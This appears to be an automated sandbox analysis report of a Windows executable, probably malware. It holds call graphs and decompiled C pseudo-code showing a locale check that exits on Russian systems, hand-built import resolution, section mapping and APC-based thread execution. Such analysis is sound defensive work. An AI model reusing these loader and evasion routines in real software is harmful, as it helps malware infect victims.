                                  execution_graph 388 4011f6 389 40120f 388->389 401 401329 ConvertStringSecurityDescriptorToSecurityDescriptorA 389->401 391 401223 402 401920 391->402 393 401248 394 4012a5 ExitThread 393->394 395 40124c lstrlenW 393->395 407 401a49 GetSystemTimeAsFileTime _aulldiv _snwprintf 395->407 399 40126f 418 401875 399->418 401->391 404 401966 402->404 405 4019e3 404->405 429 40181a RtlAllocateHeap 404->429 430 40147e RtlFreeHeap 404->430 405->393 408 401aa2 407->408 409 401aa7 CreateFileMappingW 407->409 408->409 410 401ac2 409->410 411 401b0a GetLastError 409->411 413 401adb MapViewOfFile 410->413 414 401acd GetLastError 410->414 412 401aeb 411->412 412->399 413->412 416 401af9 GetLastError 413->416 414->413 415 401ad6 414->415 417 401b01 CloseHandle 415->417 416->412 416->417 417->412 431 401b39 418->431 420 4018b1 421 4018fb 420->421 426 4012a3 BasepAppContainerEnvironmentExtension 420->426 444 40134f 420->444 455 40147e RtlFreeHeap 421->455 426->394 428 4018f3 GetLastError 428->421 429->404 430->404 456 40181a RtlAllocateHeap 431->456 433 401b47 434 401b51 GetModuleHandleA GetProcAddress 433->434 435 401bfd 433->435 436 401bf6 434->436 437 401b88 GetProcAddress 434->437 435->420 436->435 463 40147e RtlFreeHeap 436->463 437->436 439 401b9e GetProcAddress 437->439 439->436 440 401bb4 GetProcAddress 439->440 440->436 441 401bca GetProcAddress 440->441 441->436 442 401be0 441->442 457 401d95 NtCreateSection 442->457 445 401446 444->445 447 401372 444->447 445->421 450 401e3d VirtualProtect 445->450 446 401383 LoadLibraryA 446->445 446->447 447->445 447->446 449 4013ec 447->449 448 4013f5 GetProcAddress 448->449 449->447 449->448 451 4018de 450->451 452 401e86 450->452 451->421 451->428 452->451 453 401edc VirtualProtect 452->453 453->452 454 401ef1 GetLastError 453->454 454->452 455->426 456->433 458 401df9 457->458 461 401e26 457->461 464 401f78 NtMapViewOfSection 458->464 461->436 462 401e0d memset 462->461 463->435 465 401e07 464->465 465->461 465->462 466 40182f 467 40183f 466->467 468 401848 GetModuleHandleA GetCommandLineW 467->468 469 40186d ExitProcess 467->469 472 401493 468->472 504 4012b0 CreateEventA 472->504 474 401646 HeapDestroy 474->469 476 4014c0 NtQuerySystemInformation 477 40149e 476->477 477->474 477->476 511 40181a RtlAllocateHeap 477->511 512 40164b 477->512 532 40147e RtlFreeHeap 477->532 481 40151d 481->474 482 401527 GetLocaleInfoA 481->482 483 401541 GetSystemDefaultUILanguage VerLanguageNameA 482->483 484 401559 482->484 483->484 485 401638 484->485 518 401151 484->518 485->474 487 401640 GetLastError 485->487 487->474 489 4015a7 CreateThread 494 4015d5 QueueUserAPC 489->494 495 40162f GetLastError 489->495 490 401575 GetLongPathNameW 490->489 491 401589 490->491 530 40181a RtlAllocateHeap 491->530 497 40160b 494->497 498 4015ef GetLastError TerminateThread CloseHandle SetLastError 494->498 495->485 496 401593 496->489 500 40159c GetLongPathNameW 496->500 497->495 499 40160f WaitForSingleObject 497->499 498->497 501 40162a CloseHandle 499->501 502 40161f GetExitCodeThread 499->502 531 40147e RtlFreeHeap 500->531 501->485 502->501 505 401322 GetLastError 504->505 506 4012ce GetVersion 504->506 507 4012d8 506->507 508 4012e5 GetCurrentProcessId OpenProcess 507->508 509 40131d 507->509 510 401312 508->510 509->477 510->477 511->477 513 401672 512->513 514 401508 Sleep 513->514 533 40181a RtlAllocateHeap 513->533 514->477 514->481 516 4016e1 516->514 534 40147e RtlFreeHeap 516->534 535 40181a RtlAllocateHeap 518->535 520 40116f 521 401175 GetModuleFileNameW 520->521 522 4011c8 520->522 523 4011a6 521->523 528 401187 521->528 522->489 522->490 523->522 524 4011b1 523->524 525 4011b8 GetLastError 523->525 524->522 538 40147e RtlFreeHeap 525->538 528->521 528->523 536 40147e RtlFreeHeap 528->536 537 40181a RtlAllocateHeap 528->537 530->496 531->489 532->477 533->516 534->514 535->520 536->528 537->528 538->524

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_00401000 1 Function_004017C3 0->1 10 Function_0040145A 0->10 11 Function_00401B1B 0->11 13 Function_00401F1F 0->13 2 Function_00401A49 3 Function_0040164B 9 Function_0040181A 3->9 24 Function_00401FBA 3->24 26 Function_0040147E 3->26 4 Function_0040134F 5 Function_00401151 5->9 5->26 6 Function_00401493 6->3 6->5 6->9 18 Function_004012B0 6->18 6->26 7 Function_004011D3 8 Function_00401D95 22 Function_00401F78 8->22 11->7 11->10 11->13 12 Function_00401C1D 15 Function_00401CA2 12->15 12->24 14 Function_00401920 14->0 14->9 14->24 14->26 16 Function_00401329 17 Function_0040182F 17->6 19 Function_00401874 20 Function_00401875 20->4 20->12 23 Function_00401B39 20->23 25 Function_00401E3D 20->25 20->26 21 Function_004011F6 21->2 21->14 21->16 21->20 21->24 23->8 23->9 23->26

                                  Control-flow Graph

                                  C-Code - Quality: 85%
                                  			E00401493() {
                                  				long _v8;
                                  				char _v12;
                                  				char _v16;
                                  				void* _v40;
                                  				long _t28;
                                  				long _t30;
                                  				long _t31;
                                  				signed short _t33;
                                  				void* _t37;
                                  				long _t40;
                                  				long _t41;
                                  				void* _t48;
                                  				intOrPtr _t50;
                                  				signed int _t57;
                                  				signed int _t58;
                                  				long _t63;
                                  				long _t65;
                                  				intOrPtr _t66;
                                  				void* _t71;
                                  				void* _t75;
                                  				signed int _t77;
                                  				signed int _t78;
                                  				void* _t82;
                                  				intOrPtr* _t83;
                                  
                                  				_t28 = E004012B0();
                                  				_v8 = _t28;
                                  				if(_t28 != 0) {
                                  					return _t28;
                                  				}
                                  				do {
                                  					_t77 = 0;
                                  					_v12 = 0;
                                  					_t63 = 0x30;
                                  					do {
                                  						_t71 = E0040181A(_t63);
                                  						if(_t71 == 0) {
                                  							_v8 = 8;
                                  						} else {
                                  							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
                                  							_t67 = _t57;
                                  							_t58 = _t57 & 0x0000ffff;
                                  							_v8 = _t58;
                                  							if(_t58 == 4) {
                                  								_t63 = _t63 + 0x30;
                                  							}
                                  							_t78 = 0x13;
                                  							_t10 = _t67 + 1; // 0x1
                                  							_t77 =  *_t71 % _t78 + _t10;
                                  							E0040147E(_t71);
                                  						}
                                  					} while (_v8 != 0);
                                  					_t30 = E0040164B(_t77); // executed
                                  					_v8 = _t30;
                                  					Sleep(_t77 << 4); // executed
                                  					_t31 = _v8;
                                  				} while (_t31 == 0x15);
                                  				if(_t31 != 0) {
                                  					L30:
                                  					return _t31;
                                  				}
                                  				_v12 = 0;
                                  				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
                                  				if(_t33 == 0) {
                                  					__imp__GetSystemDefaultUILanguage();
                                  					_t67 =  &_v12;
                                  					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
                                  				}
                                  				if(_v12 == 0x5552) {
                                  					L28:
                                  					_t31 = _v8;
                                  					if(_t31 == 0xffffffff) {
                                  						_t31 = GetLastError();
                                  					}
                                  					goto L30;
                                  				} else {
                                  					if(E00401151(_t67,  &_v16) != 0) {
                                  						 *0x403178 = 0;
                                  						L20:
                                  						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x403180, 0, 0); // executed
                                  						_t82 = _t37;
                                  						if(_t82 == 0) {
                                  							L27:
                                  							_v8 = GetLastError();
                                  							goto L28;
                                  						}
                                  						_t40 = QueueUserAPC(E004011F6, _t82,  &_v40); // executed
                                  						if(_t40 == 0) {
                                  							_t65 = GetLastError();
                                  							TerminateThread(_t82, _t65);
                                  							CloseHandle(_t82);
                                  							_t82 = 0;
                                  							SetLastError(_t65);
                                  						}
                                  						if(_t82 == 0) {
                                  							goto L27;
                                  						} else {
                                  							_t41 = WaitForSingleObject(_t82, 0xffffffff);
                                  							_v8 = _t41;
                                  							if(_t41 == 0) {
                                  								GetExitCodeThread(_t82,  &_v8);
                                  							}
                                  							CloseHandle(_t82);
                                  							goto L28;
                                  						}
                                  					}
                                  					_t66 = _v16;
                                  					_t83 = __imp__GetLongPathNameW;
                                  					_t48 =  *_t83(_t66, 0, 0); // executed
                                  					_t75 = _t48;
                                  					if(_t75 == 0) {
                                  						L18:
                                  						 *0x403178 = _t66;
                                  						goto L20;
                                  					}
                                  					_t22 = _t75 + 2; // 0x2
                                  					_t50 = E0040181A(_t75 + _t22);
                                  					 *0x403178 = _t50;
                                  					if(_t50 == 0) {
                                  						goto L18;
                                  					}
                                  					 *_t83(_t66, _t50, _t75); // executed
                                  					E0040147E(_t66);
                                  					goto L20;
                                  				}
                                  			}



























                                  0x00401499
                                  0x0040149e
                                  0x004014a3
                                  0x0040164a
                                  0x0040164a
                                  0x004014ac
                                  0x004014ac
                                  0x004014b0
                                  0x004014b3
                                  0x004014b4
                                  0x004014ba
                                  0x004014be
                                  0x004014f5
                                  0x004014c0
                                  0x004014c8
                                  0x004014ce
                                  0x004014d0
                                  0x004014d5
                                  0x004014db
                                  0x004014dd
                                  0x004014dd
                                  0x004014e4
                                  0x004014ea
                                  0x004014ea
                                  0x004014ee
                                  0x004014ee
                                  0x004014fc
                                  0x00401503
                                  0x0040150c
                                  0x0040150f
                                  0x00401515
                                  0x00401518
                                  0x00401521
                                  0x00401646
                                  0x00000000
                                  0x00401648
                                  0x00401534
                                  0x00401537
                                  0x0040153f
                                  0x00401541
                                  0x0040154c
                                  0x00401554
                                  0x00401554
                                  0x00401562
                                  0x00401638
                                  0x00401638
                                  0x0040163e
                                  0x00401640
                                  0x00401640
                                  0x00000000
                                  0x00401568
                                  0x00401573
                                  0x004015b1
                                  0x004015b7
                                  0x004015c9
                                  0x004015cf
                                  0x004015d3
                                  0x0040162f
                                  0x00401635
                                  0x00000000
                                  0x00401635
                                  0x004015df
                                  0x004015ed
                                  0x004015f5
                                  0x004015f9
                                  0x00401600
                                  0x00401603
                                  0x00401605
                                  0x00401605
                                  0x0040160d
                                  0x00000000
                                  0x0040160f
                                  0x00401612
                                  0x00401618
                                  0x0040161d
                                  0x00401624
                                  0x00401624
                                  0x0040162b
                                  0x00000000
                                  0x0040162b
                                  0x0040160d
                                  0x00401575
                                  0x0040157a
                                  0x00401581
                                  0x00401583
                                  0x00401587
                                  0x004015a9
                                  0x004015a9
                                  0x00000000
                                  0x004015a9
                                  0x00401589
                                  0x0040158e
                                  0x00401593
                                  0x0040159a
                                  0x00000000
                                  0x00000000
                                  0x0040159f
                                  0x004015a2
                                  0x00000000
                                  0x004015a2

                                  APIs
                                    • Part of subcall function 004012B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040149E), ref: 004012BF
                                    • Part of subcall function 004012B0: GetVersion.KERNEL32 ref: 004012CE
                                    • Part of subcall function 004012B0: GetCurrentProcessId.KERNEL32 ref: 004012EA
                                    • Part of subcall function 004012B0: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401303
                                    • Part of subcall function 0040181A: RtlAllocateHeap.NTDLL(00000000,?,004014BA,00000030,?,00000000), ref: 00401826
                                  • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004014C8
                                  • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 0040150F
                                  • GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401537
                                  • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401541
                                  • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401554
                                  • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401581
                                  • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 0040159F
                                  • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 004015C9
                                  • QueueUserAPC.KERNELBASE(004011F6,00000000,?,?,00000000), ref: 004015DF
                                  • GetLastError.KERNEL32(?,00000000), ref: 004015EF
                                  • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 004015F9
                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401600
                                  • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401605
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401612
                                  • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401624
                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 0040162B
                                  • GetLastError.KERNEL32(?,00000000), ref: 0040162F
                                  • GetLastError.KERNEL32(?,00000000), ref: 00401640
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.569379603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.569373572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569386485.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569391208.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569396828.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_d2ef5.jbxd
                                  Similarity
                                  • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
                                  • String ID:
                                  • API String ID: 3475612337-0
                                  • Opcode ID: fda34ba359e64ccf93289e306a0c7ba5ae66b60962868661fcd4dfbef77cc745
                                  • Instruction ID: af16b420b445b8790a0e43c51f3fc8c451078355e8a2a53fe19e92f811f25c67
                                  • Opcode Fuzzy Hash: fda34ba359e64ccf93289e306a0c7ba5ae66b60962868661fcd4dfbef77cc745
                                  • Instruction Fuzzy Hash: 3C51C671900614BBD721AFA58E88DAF7A7CEB44314F144137FA01F72E0D7788A01CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 69%
                                  			E00401A49(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                  				intOrPtr _v12;
                                  				struct _FILETIME* _v16;
                                  				short _v60;
                                  				struct _FILETIME* _t14;
                                  				intOrPtr _t15;
                                  				long _t18;
                                  				void* _t19;
                                  				void* _t22;
                                  				intOrPtr _t31;
                                  				long _t32;
                                  				void* _t34;
                                  
                                  				_t31 = __edx;
                                  				_t14 =  &_v16;
                                  				GetSystemTimeAsFileTime(_t14);
                                  				_push(0x192);
                                  				_push(0x54d38000);
                                  				_push(_v12);
                                  				_push(_v16);
                                  				L00401FFA();
                                  				_push(_t14);
                                  				_v16 = _t14;
                                  				_t15 =  *0x403184;
                                  				_push(_t15 + 0x40405e);
                                  				_push(_t15 + 0x404054);
                                  				_push(0x16);
                                  				_push( &_v60);
                                  				_v12 = _t31;
                                  				L00401FF4();
                                  				_t18 = _a4;
                                  				if(_t18 == 0) {
                                  					_t18 = 0x1000;
                                  				}
                                  				_t19 = CreateFileMappingW(0xffffffff, 0x403188, 4, 0, _t18,  &_v60); // executed
                                  				_t34 = _t19;
                                  				if(_t34 == 0) {
                                  					_t32 = GetLastError();
                                  				} else {
                                  					if(_a4 != 0 || GetLastError() == 0xb7) {
                                  						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                  						if(_t22 == 0) {
                                  							_t32 = GetLastError();
                                  							if(_t32 != 0) {
                                  								goto L9;
                                  							}
                                  						} else {
                                  							 *_a8 = _t34;
                                  							 *_a12 = _t22;
                                  							_t32 = 0;
                                  						}
                                  					} else {
                                  						_t32 = 2;
                                  						L9:
                                  						CloseHandle(_t34);
                                  					}
                                  				}
                                  				return _t32;
                                  			}














                                  0x00401a49
                                  0x00401a52
                                  0x00401a56
                                  0x00401a5c
                                  0x00401a61
                                  0x00401a66
                                  0x00401a69
                                  0x00401a6c
                                  0x00401a71
                                  0x00401a72
                                  0x00401a75
                                  0x00401a80
                                  0x00401a87
                                  0x00401a8b
                                  0x00401a8d
                                  0x00401a8e
                                  0x00401a91
                                  0x00401a96
                                  0x00401aa0
                                  0x00401aa2
                                  0x00401aa2
                                  0x00401ab6
                                  0x00401abc
                                  0x00401ac0
                                  0x00401b10
                                  0x00401ac2
                                  0x00401acb
                                  0x00401ae1
                                  0x00401ae9
                                  0x00401afb
                                  0x00401aff
                                  0x00000000
                                  0x00000000
                                  0x00401aeb
                                  0x00401aee
                                  0x00401af3
                                  0x00401af5
                                  0x00401af5
                                  0x00401ad6
                                  0x00401ad8
                                  0x00401b01
                                  0x00401b02
                                  0x00401b02
                                  0x00401acb
                                  0x00401b18

                                  APIs
                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,0040126F,0000000A,?,?), ref: 00401A56
                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401A6C
                                  • _snwprintf.NTDLL ref: 00401A91
                                  • CreateFileMappingW.KERNELBASE(000000FF,00403188,00000004,00000000,?,?), ref: 00401AB6
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040126F,0000000A,?), ref: 00401ACD
                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401AE1
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040126F,0000000A,?), ref: 00401AF9
                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040126F,0000000A), ref: 00401B02
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040126F,0000000A,?), ref: 00401B0A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.569379603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.569373572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569386485.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569391208.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569396828.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_d2ef5.jbxd
                                  Similarity
                                  • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                  • String ID:
                                  • API String ID: 1724014008-0
                                  • Opcode ID: d777c09a78f82427ffff02114adef762b53d280cb3579f302ddc5db8f904bf6f
                                  • Instruction ID: 1ca23827cf46cf4e4b48cd91b4d32e6437ca3dc37cb5e0f42cf8925e636595e9
                                  • Opcode Fuzzy Hash: d777c09a78f82427ffff02114adef762b53d280cb3579f302ddc5db8f904bf6f
                                  • Instruction Fuzzy Hash: 3B21A1B2600204BBDB11AFA8CD88E9F37BDEB48351F11403AF605F61E0D7B45945CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 81 401d95-401df7 NtCreateSection 82 401df9-401e02 call 401f78 81->82 83 401e2e-401e32 81->83 85 401e07-401e0b 82->85 89 401e34-401e3a 83->89 87 401e26-401e2c 85->87 88 401e0d-401e24 memset 85->88 87->89 88->89
                                  C-Code - Quality: 72%
                                  			E00401D95(intOrPtr* __eax, void** _a4) {
                                  				int _v12;
                                  				void* _v16;
                                  				void* _v20;
                                  				void* _v24;
                                  				int _v28;
                                  				int _v32;
                                  				intOrPtr _v36;
                                  				int _v40;
                                  				int _v44;
                                  				void* _v48;
                                  				void* __esi;
                                  				long _t34;
                                  				void* _t39;
                                  				void* _t47;
                                  				intOrPtr* _t48;
                                  
                                  				_t48 = __eax;
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				_v24 =  *((intOrPtr*)(__eax + 4));
                                  				_v16 = 0;
                                  				_v12 = 0;
                                  				_v48 = 0x18;
                                  				_v44 = 0;
                                  				_v36 = 0x40;
                                  				_v40 = 0;
                                  				_v32 = 0;
                                  				_v28 = 0;
                                  				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                  				if(_t34 < 0) {
                                  					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                  				} else {
                                  					 *_t48 = _v16;
                                  					_t39 = E00401F78(_t48,  &_v12); // executed
                                  					_t47 = _t39;
                                  					if(_t47 != 0) {
                                  						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                  					} else {
                                  						memset(_v12, 0, _v24);
                                  						 *_a4 = _v12;
                                  					}
                                  				}
                                  				return _t47;
                                  			}


















                                  0x00401d9e
                                  0x00401da5
                                  0x00401da6
                                  0x00401da7
                                  0x00401da8
                                  0x00401da9
                                  0x00401dba
                                  0x00401dbe
                                  0x00401dd2
                                  0x00401dd5
                                  0x00401dd8
                                  0x00401ddf
                                  0x00401de2
                                  0x00401de9
                                  0x00401dec
                                  0x00401def
                                  0x00401df2
                                  0x00401df7
                                  0x00401e32
                                  0x00401df9
                                  0x00401dfc
                                  0x00401e02
                                  0x00401e07
                                  0x00401e0b
                                  0x00401e29
                                  0x00401e0d
                                  0x00401e14
                                  0x00401e22
                                  0x00401e22
                                  0x00401e0b
                                  0x00401e3a

                                  APIs
                                  • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 00401DF2
                                    • Part of subcall function 00401F78: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401E07,00000002,00000000,?,?,00000000,?,?,00401E07,00000002), ref: 00401FA5
                                  • memset.NTDLL ref: 00401E14
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.569379603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.569373572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569386485.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569391208.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569396828.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_d2ef5.jbxd
                                  Similarity
                                  • API ID: Section$CreateViewmemset
                                  • String ID: @
                                  • API String ID: 2533685722-2766056989
                                  • Opcode ID: 8fe031f21ff8d8f0d562623575e9c79972356a6159cf272cee247311ce50a0ce
                                  • Instruction ID: 51ff91b96694bad68c08ba82d5134d0fe6a1f199b3c348713c8e4c0aaae189fe
                                  • Opcode Fuzzy Hash: 8fe031f21ff8d8f0d562623575e9c79972356a6159cf272cee247311ce50a0ce
                                  • Instruction Fuzzy Hash: A8211DB5D00209AFCB11DFA9C8849DFFBB9EF48354F10443AE505F7260D7349A458BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 104 40134f-40136c 105 401452-401457 104->105 106 401372-40137c 104->106 106->105 107 401382 106->107 108 401383-401392 LoadLibraryA 107->108 109 401448-40144e 108->109 110 401398-4013ae 108->110 113 401451 109->113 111 4013b0-4013b4 110->111 112 4013b6-4013be 110->112 111->112 114 401434-401440 111->114 115 401423-401427 112->115 113->105 114->108 118 401446 114->118 116 4013c0 115->116 117 401429 115->117 119 4013c2-4013c4 116->119 120 4013c6-4013c8 116->120 117->114 118->113 121 4013d6-4013d9 119->121 122 4013ca-4013d4 120->122 123 4013db-4013e2 120->123 124 4013e5-4013ea 121->124 122->121 122->123 123->124 125 4013f1 124->125 126 4013ec-4013ef 124->126 127 4013f5-401401 GetProcAddress 125->127 126->127 128 401403-401408 127->128 129 40142b-401431 127->129 130 401412-401420 128->130 131 40140a-401410 128->131 129->114 130->115 131->130
                                  C-Code - Quality: 100%
                                  			E0040134F(void* __edi, intOrPtr _a4) {
                                  				signed int _v8;
                                  				intOrPtr* _v12;
                                  				_Unknown_base(*)()** _v16;
                                  				signed int _v20;
                                  				signed short _v24;
                                  				struct HINSTANCE__* _v28;
                                  				intOrPtr _t43;
                                  				intOrPtr* _t45;
                                  				intOrPtr _t46;
                                  				struct HINSTANCE__* _t47;
                                  				intOrPtr* _t49;
                                  				intOrPtr _t50;
                                  				signed short _t51;
                                  				_Unknown_base(*)()* _t53;
                                  				CHAR* _t54;
                                  				_Unknown_base(*)()* _t55;
                                  				void* _t58;
                                  				signed int _t59;
                                  				_Unknown_base(*)()* _t60;
                                  				intOrPtr _t61;
                                  				intOrPtr _t65;
                                  				signed int _t68;
                                  				void* _t69;
                                  				CHAR* _t71;
                                  				signed short* _t73;
                                  
                                  				_t69 = __edi;
                                  				_v20 = _v20 & 0x00000000;
                                  				_t59 =  *0x403180;
                                  				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
                                  				if(_t43 != 0) {
                                  					_t45 = _t43 + __edi;
                                  					_v12 = _t45;
                                  					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                  					if(_t46 != 0) {
                                  						while(1) {
                                  							_t71 = _t46 + _t69;
                                  							_t47 = LoadLibraryA(_t71); // executed
                                  							_v28 = _t47;
                                  							if(_t47 == 0) {
                                  								break;
                                  							}
                                  							_v24 = _v24 & 0x00000000;
                                  							 *_t71 = _t59 - 0x69b25f44;
                                  							_t49 = _v12;
                                  							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                  							_t50 =  *_t49;
                                  							if(_t50 != 0) {
                                  								L6:
                                  								_t73 = _t50 + _t69;
                                  								_v16 = _t61 + _t69;
                                  								while(1) {
                                  									_t51 =  *_t73;
                                  									if(_t51 == 0) {
                                  										break;
                                  									}
                                  									if(__eflags < 0) {
                                  										__eflags = _t51 - _t69;
                                  										if(_t51 < _t69) {
                                  											L12:
                                  											_t21 =  &_v8;
                                  											 *_t21 = _v8 & 0x00000000;
                                  											__eflags =  *_t21;
                                  											_v24 =  *_t73 & 0x0000ffff;
                                  										} else {
                                  											_t65 = _a4;
                                  											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                  											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                  												goto L12;
                                  											} else {
                                  												goto L11;
                                  											}
                                  										}
                                  									} else {
                                  										_t51 = _t51 + _t69;
                                  										L11:
                                  										_v8 = _t51;
                                  									}
                                  									_t53 = _v8;
                                  									__eflags = _t53;
                                  									if(_t53 == 0) {
                                  										_t54 = _v24 & 0x0000ffff;
                                  									} else {
                                  										_t54 = _t53 + 2;
                                  									}
                                  									_t55 = GetProcAddress(_v28, _t54);
                                  									__eflags = _t55;
                                  									if(__eflags == 0) {
                                  										_v20 = _t59 - 0x69b25ec5;
                                  									} else {
                                  										_t68 = _v8;
                                  										__eflags = _t68;
                                  										if(_t68 != 0) {
                                  											 *_t68 = _t59 - 0x69b25f44;
                                  										}
                                  										 *_v16 = _t55;
                                  										_t58 = 0x593682f4 + _t59 * 4;
                                  										_t73 = _t73 + _t58;
                                  										_t32 =  &_v16;
                                  										 *_t32 = _v16 + _t58;
                                  										__eflags =  *_t32;
                                  										continue;
                                  									}
                                  									goto L23;
                                  								}
                                  							} else {
                                  								_t50 = _t61;
                                  								if(_t61 != 0) {
                                  									goto L6;
                                  								}
                                  							}
                                  							L23:
                                  							_v12 = _v12 + 0x14;
                                  							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                  							if(_t46 != 0) {
                                  								continue;
                                  							} else {
                                  							}
                                  							L26:
                                  							goto L27;
                                  						}
                                  						_t60 = _t59 + 0x964da13a;
                                  						__eflags = _t60;
                                  						_v20 = _t60;
                                  						goto L26;
                                  					}
                                  				}
                                  				L27:
                                  				return _v20;
                                  			}




























                                  0x0040134f
                                  0x00401358
                                  0x0040135d
                                  0x00401363
                                  0x0040136c
                                  0x00401372
                                  0x00401374
                                  0x00401377
                                  0x0040137c
                                  0x00401383
                                  0x00401383
                                  0x00401387
                                  0x0040138d
                                  0x00401392
                                  0x00000000
                                  0x00000000
                                  0x00401398
                                  0x004013a2
                                  0x004013a4
                                  0x004013a7
                                  0x004013aa
                                  0x004013ae
                                  0x004013b6
                                  0x004013b8
                                  0x004013bb
                                  0x00401423
                                  0x00401423
                                  0x00401427
                                  0x00000000
                                  0x00000000
                                  0x004013c0
                                  0x004013c6
                                  0x004013c8
                                  0x004013db
                                  0x004013de
                                  0x004013de
                                  0x004013de
                                  0x004013e2
                                  0x004013ca
                                  0x004013ca
                                  0x004013d2
                                  0x004013d4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004013d4
                                  0x004013c2
                                  0x004013c2
                                  0x004013d6
                                  0x004013d6
                                  0x004013d6
                                  0x004013e5
                                  0x004013e8
                                  0x004013ea
                                  0x004013f1
                                  0x004013ec
                                  0x004013ec
                                  0x004013ec
                                  0x004013f9
                                  0x004013ff
                                  0x00401401
                                  0x00401431
                                  0x00401403
                                  0x00401403
                                  0x00401406
                                  0x00401408
                                  0x00401410
                                  0x00401410
                                  0x00401415
                                  0x00401417
                                  0x0040141e
                                  0x00401420
                                  0x00401420
                                  0x00401420
                                  0x00000000
                                  0x00401420
                                  0x00000000
                                  0x00401401
                                  0x004013b0
                                  0x004013b0
                                  0x004013b4
                                  0x00000000
                                  0x00000000
                                  0x004013b4
                                  0x00401434
                                  0x00401434
                                  0x0040143b
                                  0x00401440
